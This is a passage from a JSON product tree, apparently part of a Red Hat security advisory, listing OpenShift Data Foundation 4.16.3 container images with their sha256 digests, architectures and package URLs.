"purl": "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product": {
